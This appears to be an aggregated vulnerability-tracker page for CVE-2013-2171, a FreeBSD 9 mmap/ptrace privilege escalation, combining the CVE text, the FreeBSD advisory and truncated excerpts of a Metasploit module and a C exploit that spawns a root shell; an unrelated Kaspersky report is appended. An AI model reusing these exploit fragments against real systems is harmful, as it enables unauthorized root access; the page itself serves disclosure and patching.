CVE-2013-2171
Published 2013-07-02
CVE-2013-2171: The vm_map_lookup function in sys/vm/vm_map.c in the mmap implementation in the kernel in FreeBSD 9.0 through 9.1-RELEASE-p4 does not properly determine…
Priority P339 · medium · 6.9 (CVSS 2.0)
AV:L/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 6.94% (93.3th percentile)
The vm_map_lookup function in sys/vm/vm_map.c in the mmap implementation in the kernel in FreeBSD 9.0 through 9.1-RELEASE-p4 does not properly determine whether a task should have write access to a memory location, which allows local users to bypass filesystem write permissions and consequently gain privileges via a crafted application that leverages read permissions, and makes mmap and ptrace system calls.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| freebsd | freebsd | — | — |
| freebsd | freebsd | — | — |
GHSA
GHSA-gmfh-rp5h-w5mv: The vm_map_lookup function in sys/vm/vm_map
ghsa_unreviewed·2022-05-14
CVE-2013-2171 [MEDIUM] GHSA-gmfh-rp5h-w5mv: The vm_map_lookup function in sys/vm/vm_map
The vm_map_lookup function in sys/vm/vm_map.c in the mmap implementation in the kernel in FreeBSD 9.0 through 9.1-RELEASE-p4 does not properly determine whether a task should have write access to a memory location, which allows local users to bypass filesystem write permissions and consequently gain privileges via a crafted application that leverages read permissions, and makes mmap and ptrace system calls.
BSD
FreeBSD-SA-13:06.mmap: Privilege escalation via mmap
bsd_advisories·2013-06-18·CVSS 6.9
CVE-2013-2171 [MEDIUM] FreeBSD-SA-13:06.mmap: Privilege escalation via mmap
FreeBSD-SA-13:06.mmap Security Advisory
The FreeBSD Project
Topic: Privilege escalation via mmap
Category: core
Module: kernel
Announced: 2013-06-18
Credits: Konstantin Belousov
Alan Cox
Affects: FreeBSD 9.0 and later
Corrected: 2013-06-18 07:04:19 UTC (stable/9, 9.1-STABLE)
2013-06-18 07:05:51 UTC (releng/9.1, 9.1-RELEASE-p4)
CVE Name: CVE-2013-2171
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit .
0. Revision History
v1.0 2013-06-18 Initial release.
v1.1 2013-06-21 Corrected correction date.
Added workaround information.
I. Background
The FreeBSD virtual memory system allows files to be memory-mapped.
All or parts of a file can be made available to a process via i
No detection rules found.
Exploit-DB
FreeBSD 9 - Address Space Manipulation Privilege Escalation (Metasploit)
exploitdb·2013-06-26
CVE-2013-2171 FreeBSD 9 - Address Space Manipulation Privilege Escalation (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit4 'FreeBSD 9 Address Space Manipulation Privilege Escalation',
'Description' => %q{
This module exploits a vulnerability that can be used to modify portions of
a process's address space, which may lead to privilege escalation. Systems
such as FreeBSD 9.0 and 9.1 are known to be vulnerable.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Konstantin Belousov', # Discovery
'Alan Cox', # Discovery
'Hunger', # POC
'sinn3r' # Metasploit
],
'Platform' =>
Exploit-DB
FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Local Privilege Escalation
exploitdb·2013-06-21
CVE-2013-2171 FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Local Privilege Escalation
FreeBSD 9.0
*
* Happy Birthday FreeBSD!
* Now you are 20 years old and your security is the same as 20 years ago... :)
*
* Greetings to #nohup, _2501, boldi, eax, johnny_b, kocka, op, pipacs, prof,
* sd, sghctoma, snq, spender, s2crew and others at #hekkcamp:
* I hope we'll meet again at 8@1470n ;)
*
* Special thanks to proactivesec.com
*
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define SH "/bin/sh"
#define TG "/usr/sbin/timedc"
int
main(int ac, char **av) {
int from_fd, to_fd, status;
struct stat st;
struct ptrace_io_desc piod;
char *s, *d;
pid_t pid;
if (geteuid() == 0) {
setuid(0);
execl(SH, SH, NULL);
return 0;
}
printf("FreeBSD 9.{0,1} mmap/ptrace exploit\n");
printf("by Hunger \n");
if ((from_fd = open(av[0],
Metasploit
FreeBSD 9 Address Space Manipulation Privilege Escalation
metasploit
This module exploits a vulnerability that can be used to modify portions of a process's address space, which may lead to privilege escalation. Systems such as FreeBSD 9.0 and 9.1 are known to be vulnerable.
Securelist
Investigation Report for the September 2014 Equation malware detection incident in the US
blogs_securelist·2017-11-16
Investigation Report for the September 2014 Equation malware detection incident in the US
Authors
- Kaspersky
## Background
In early October, a story was published by the Wall Street Journal alleging Kaspersky Lab software was used to siphon classified data from an NSA employee’s home computer system. Given that Kaspersky Lab has been at the forefront of fighting cyberespionage and cybercriminal activities on the Internet for over 20 years now, these allegations were treated very seriously. To assist any independent investigators and all the people who have been asking us questions whether those allegations were true, we decided to conduct an internal investigation to attempt to answer a few questions we had related to the article and some others that followed it:
1. Was our software used outside of its intended functionality to pull classified information from a person’s c
http://svnweb.freebsd.org/base?view=revision&revision=251901
http://www.debian.org/security/2013/dsa-2714
http://www.freebsd.org/security/advisories/FreeBSD-SA-13:06.mmap.asc